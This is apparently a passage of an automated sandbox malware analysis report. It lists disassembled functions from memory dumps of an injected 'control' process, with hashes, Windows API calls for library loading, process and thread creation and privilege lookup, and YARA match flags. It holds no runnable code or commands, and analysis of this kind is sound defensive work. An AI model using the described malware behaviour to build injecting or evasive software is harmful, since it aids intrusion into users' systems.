                                  • Instruction ID: ddaf452579845ff707410a2fd4ebfb064b72e6ff97e2ff805980d716dbb8f8cc
                                  • Opcode Fuzzy Hash: 894c120c9397dcfed62150273ede9edd831f9e52f4b8c009943c3e7a3689d32f
                                  • Instruction Fuzzy Hash: 22900221221C0042F70075684C14B0700558BD1707F55C115B015D664CC915DD616525
                                  Function 04D82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 85ad68b13e03fa6a0a5bd620e9c424cf60337b3692c334acae7952859d2fe17a
                                  • Instruction ID: 97070105eb9129323744c2d22488c3d9edd72b3a56ce82b9dfabec8bc7b74f8e
                                  • Opcode Fuzzy Hash: 85ad68b13e03fa6a0a5bd620e9c424cf60337b3692c334acae7952859d2fe17a
                                  • Instruction Fuzzy Hash: 4490026135140442F70071584414B060055CBE2705F55C015F106D664D8619DD52712A
                                  Function 04D82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 64f6981dce2b456a7bf109d94cad2afeb3ea369062a2ed29e02b2bc9a0621fe1
                                  • Instruction ID: 81e429494a5ad4380d4329ffd607ae90237a0aaa26cb09e0cb29a05357d5968d
                                  • Opcode Fuzzy Hash: 64f6981dce2b456a7bf109d94cad2afeb3ea369062a2ed29e02b2bc9a0621fe1
                                  • Instruction Fuzzy Hash: 8B900225221400032705B558070450700968BD6755355C021F101E660CD621DD616125
                                  Function 04D82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2220dc27cf370f9369bb30dffdea4f99a8ea2767898f3a8d07061b2f2a6676ee
                                  • Instruction ID: 303b55a1aa2bf15e0abc75ced625435ca66e94ada14e6271f2e5a4c3d79157e7
                                  • Opcode Fuzzy Hash: 2220dc27cf370f9369bb30dffdea4f99a8ea2767898f3a8d07061b2f2a6676ee
                                  • Instruction Fuzzy Hash: 1D90023121140802F7807158440464A00558BD2705F95C015B002E764DCA15DF5977A5
                                  Function 04D82BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9486f4b962160e8f5aba5a6124ae39780ca64de2fdf0f917a7aa560dab96227d
                                  • Instruction ID: 519cace7685345e79f54fb7369187630a6a26f15c25d346107686a0fce1fca8b
                                  • Opcode Fuzzy Hash: 9486f4b962160e8f5aba5a6124ae39780ca64de2fdf0f917a7aa560dab96227d
                                  • Instruction Fuzzy Hash: A890023121544842F74071584404A4600658BD1709F55C011B006D7A4D9625DE55B665
                                  Function 04D82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 892ffdab1c9267dab654ed666d08b46fcf12f5fb39ed69cb9291efdc439a432c
                                  • Instruction ID: 173719ace1715a4094375c4e11dba245aadbb6de7c74ea31c1b25427ffa26e1c
                                  • Opcode Fuzzy Hash: 892ffdab1c9267dab654ed666d08b46fcf12f5fb39ed69cb9291efdc439a432c
                                  • Instruction Fuzzy Hash: CF90026121240003670571584414616405A8BE1605B55C021F101D6A0DC525DD917129
                                  Function 04D835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c9f76c745e79497a7392bedae189e8811826b5b7879196b7e0bed71cfa3e1dd7
                                  • Instruction ID: dc52a33a2667bf8b819ecdae9022ba5bd4ad9dbf16d60a95b1db640feb4b1fd2
                                  • Opcode Fuzzy Hash: c9f76c745e79497a7392bedae189e8811826b5b7879196b7e0bed71cfa3e1dd7
                                  • Instruction Fuzzy Hash: 4A90023161550402F7007158451470610558BD1605F65C411B042D678D8795DE5175A6
                                  Function 02B49050 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 399 2b49050-2b49092 call 2b4bd10 402 2b4916c-2b49172 399->402 403 2b49098-2b490e8 call 2b4bde0 call 2b3acf0 call 2b44e50 399->403 410 2b490f0-2b49101 Sleep 403->410 411 2b49166-2b4916a 410->411 412 2b49103-2b49109 410->412 411->402 411->410 413 2b49133-2b49154 call 2b48e80 412->413 414 2b4910b-2b49131 call 2b48c70 412->414 418 2b49159-2b4915c 413->418 414->418 418->411
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02B490F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 97f5b2742c7a20207df6cd05a41e5c5d838a2148da8c0b3e46eeee33a577d05b
                                  • Instruction ID: 59263e803eea7c844d160a052c3fe068f6c55341191a22d4d1eed60bad805aa1
                                  • Opcode Fuzzy Hash: 97f5b2742c7a20207df6cd05a41e5c5d838a2148da8c0b3e46eeee33a577d05b
                                  • Instruction Fuzzy Hash: CF3181B2900644BBC724DF64C8C5F67B7B9EB48B00F10815DE62A6B245DA70B650CBA8
                                  Function 02B49047 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 419 2b49047-2b49092 call 2b4bd10 423 2b4916c-2b49172 419->423 424 2b49098-2b490e8 call 2b4bde0 call 2b3acf0 call 2b44e50 419->424 431 2b490f0-2b49101 Sleep 424->431 432 2b49166-2b4916a 431->432 433 2b49103-2b49109 431->433 432->423 432->431 434 2b49133-2b49154 call 2b48e80 433->434 435 2b4910b-2b49131 call 2b48c70 433->435 439 2b49159-2b4915c 434->439 435->439 439->432
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02B490F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 8daac05ae1746c646018703e97b43ecf0c10a356cdb5ee36d80871430713fd04
                                  • Instruction ID: b3f606de39e9e6adf77e8b5e49a49acc05bd284ce69629b89449f413903f3d0f
                                  • Opcode Fuzzy Hash: 8daac05ae1746c646018703e97b43ecf0c10a356cdb5ee36d80871430713fd04
                                  • Instruction Fuzzy Hash: 5431C1B2900641BBC714DF68CCC5F67B7B8FB48B04F10819DE6296B245DB70B650DBA4
                                  Function 02B4A5C6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 543 2b4a5c6-2b4a5cc 544 2b4a59d-2b4a5a4 543->544 545 2b4a5ce 543->545 546 2b4a5ac-2b4a5c1 call 4d82c70 544->546 547 2b4a5a7 call 2b4af30 544->547 548 2b4a5d0-2b4a5fd call 2b4af30 545->548 549 2b4a64b-2b4a654 545->549 553 2b4a5c3-2b4a5c5 546->553 547->546 551 2b4a65c-2b4a671 RtlFreeHeap 549->551 552 2b4a657 call 2b4af30 549->552 552->551
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B33AF8), ref: 02B4A66D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: c710aa6f81abb34eb9557e97aefccbcadc3a04194c4c20b32b0a075ced58ceab
                                  • Instruction ID: be225cf1b57fdf2c3262af6ebef5e170bccd09bfb336cbc99062e1b1141bde15
                                  • Opcode Fuzzy Hash: c710aa6f81abb34eb9557e97aefccbcadc3a04194c4c20b32b0a075ced58ceab
                                  • Instruction Fuzzy Hash: E4119EBA2042046FDB14EFA8DCD0DEB77A9EF84314B408589FC5987302D630E911DBB0
                                  Function 02B4A640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 560 2b4a640-2b4a671 call 2b4af30 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B33AF8), ref: 02B4A66D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 25ebfe95e9534fdfe558201847a369aec7afda8d13a528e7c388ff987336c30a
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 47E01AB12102046BD714EF59CC44EA777ADAF88750F014555BD0857241C630E9108AB0
                                  Function 02B38310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 563 2b38310-2b3833d call 2b4be30 call 2b4c9d0 568 2b38343-2b3835a call 2b44e50 563->568 569 2b3833e call 2b3acf0 563->569 572 2b3838e-2b38392 568->572 573 2b3835c-2b3836e PostThreadMessageW 568->573 569->568 574 2b38370-2b3838b call 2b3a480 PostThreadMessageW 573->574 575 2b3838d 573->575 574->575 575->572
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B3836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B3838B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                  • Instruction ID: 54b2c88fc1b65c456edd5b8e75b5bd642f5ca4a658d687089235435269af4971
                                  • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                  • Instruction Fuzzy Hash: 9A01A731A8122877E721A6949C42FBE776D9B40F50F144155FF04BA1C1EAA4790547F6
                                  Function 02B382D3 Relevance: 3.1, APIs: 2, Instructions: 52threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 578 2b382d3-2b382df 579 2b382e1 578->579 580 2b38337-2b3835a call 2b3acf0 call 2b44e50 578->580 581 2b382eb-2b382fd call 2b4b720 579->581 582 2b382e6 call 2b4b870 579->582 589 2b3838e-2b38392 580->589 590 2b3835c-2b3836e PostThreadMessageW 580->590 582->581 591 2b38370-2b3838b call 2b3a480 PostThreadMessageW 590->591 592 2b3838d 590->592 591->592 592->589
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B3836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B3838B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 11fb7617b85aa47b16f5f024dcd02188c636c34022a2a31c27493a18eb9d4f5a
                                  • Instruction ID: 6c8085a433361cb7a4c2e3384de1d478428febf8cb79fc962a77ba511f00661d
                                  • Opcode Fuzzy Hash: 11fb7617b85aa47b16f5f024dcd02188c636c34022a2a31c27493a18eb9d4f5a
                                  • Instruction Fuzzy Hash: 1F017D32A4022932EB2266743C42FFA730C9B01F64F0401E5FE04EB2C0EA91F50556E3
                                  Function 02B3ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B3AD62
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: f748f176b8dfe33b72b187a63c487b8f41e666cd93d9fa76fbe54b9981629965
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: 2D011EB5E0020DBBDB10EAE4DC81F9DB7799B54708F1045E5E94897241FA31EB14DB91
                                  Function 02B4A6AD Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B4A704
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 7b49a99931ad2f049d45eef54a0a5772e9f4f0e6ed0a9cfa590843b57ff0d4b8
                                  • Instruction ID: 3f92d026cb825f6e2613d352cdadeee52a2d5e8945fb80d728f5bdb4c98b4138
                                  • Opcode Fuzzy Hash: 7b49a99931ad2f049d45eef54a0a5772e9f4f0e6ed0a9cfa590843b57ff0d4b8
                                  • Instruction Fuzzy Hash: 3901AFB2215108ABCB54DF89DC80EEB37ADAF8C754F158258FE0D97241C630E851CBA0
                                  Function 02B4A6B0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B4A704
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 1d7fc88aabe07ca1dcf5b66e88194fcc7617f3d1e63060890281a64ea58a770c
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 4101B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                  Function 02B49180 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B3F050,?,?,00000000), ref: 02B491BC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                  • Instruction ID: bd1854f4514b7f6ec0713e1899570e46b57b26338e4521b3c07e5971db338ba7
                                  • Opcode Fuzzy Hash: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                  • Instruction Fuzzy Hash: AAE092373903043AE3306999AC42FA7B39CCB81B60F14006AFA4DEB2C0D995F44146E4
                                  Function 02B4A632 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02B44536,?,02B44CAF,02B44CAF,?,02B44536,?,?,?,?,?,00000000,00000000,?), ref: 02B4A62D
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 32e21e6d0a82522bed167e9b5e4d2873307510b5087c1c47a31221bf81a3f655
                                  • Instruction ID: 6cd440622f1d77cdfaf58015502fe1dc7079747c3eea86a92f0842838cfeb2b7
                                  • Opcode Fuzzy Hash: 32e21e6d0a82522bed167e9b5e4d2873307510b5087c1c47a31221bf81a3f655
                                  • Instruction Fuzzy Hash: C0E0867614A1982AEB14B7E43DD14F77F1CCAC51297184AEAFA8C9D507C835911193A1
                                  Function 02B4A600 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02B44536,?,02B44CAF,02B44CAF,?,02B44536,?,?,?,?,?,00000000,00000000,?), ref: 02B4A62D
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: 04075f397aeb4a01c0f20f801cffd2f8a6b6f51e7e1fa8d327f53f35cdf72b1f
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: A2E01AB1210204ABD714EF59CC40EA777ADAF88654F114559BE085B241C530F9118BB0
                                  Function 02B4A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B3F1D2,02B3F1D2,?,00000000,?,?), ref: 02B4A7D0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: d43b69326b79a469f66cbee8ebeeb5b213eb125baf47dc064b8e8999eb89c65f
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: 53E01AB12102086BDB10EF49CC84EE737ADAF88650F018155BE0857241C930E8118BF5
                                  Function 02B3F6C7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,02B38D14,?), ref: 02B3F6FB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 3890f07af39cb5171fb6a0a51aa0889719c1b467f86a24dbe60132c4c3443d6c
                                  • Instruction ID: 9c717794a8fe745bc387f2ceeeea48bc5187585645e0ed8ea4e7aee57ae6f9d4
                                  • Opcode Fuzzy Hash: 3890f07af39cb5171fb6a0a51aa0889719c1b467f86a24dbe60132c4c3443d6c
                                  • Instruction Fuzzy Hash: 31E0C271A803092FE720EEB49C06F6B72A59B52714F0D01A8F599AA2C3DB64E101C620
                                  Function 02B3F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,02B38D14,?), ref: 02B3F6FB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                  • Instruction ID: 3be29000226f430abb7457f55b1080a521f4ddbb66a0a51e10416f437f3ce697
                                  • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                  • Instruction Fuzzy Hash: DBD05E616903082AE610AAA49C02F2632899B44A04F4900A4F948962C3DD60E0008565
                                  Function 04D82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                  • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1e7d63fc9a83100b15d7be3b27384a8bae438f942e7af89ea848d58fd2e8beca
                                  • Instruction ID: 02a5783778f527960c6ebb2f91ec2e0f5d4e568b1331842398e815e12d98e41c
                                  • Opcode Fuzzy Hash: 1e7d63fc9a83100b15d7be3b27384a8bae438f942e7af89ea848d58fd2e8beca
                                  • Instruction Fuzzy Hash: DDB09B719015C5C5FF11F760460972779507BD1705F15C065E2034755E4738D5D1F175

                                  Non-executed Functions

                                  Function 008738B0 Relevance: 51.1, APIs: 16, Strings: 13, Instructions: 343commemorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,-00000002,00000000), ref: 0087395A
                                  • StrCmpICW.SHLWAPI(-00000002,PANEL), ref: 00873971
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,/name,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AA4B
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,-name,?,?), ref: 0087AA5B
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,/page,00000000,?,?), ref: 0087AA9D
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,-page,?,?), ref: 0087AAAD
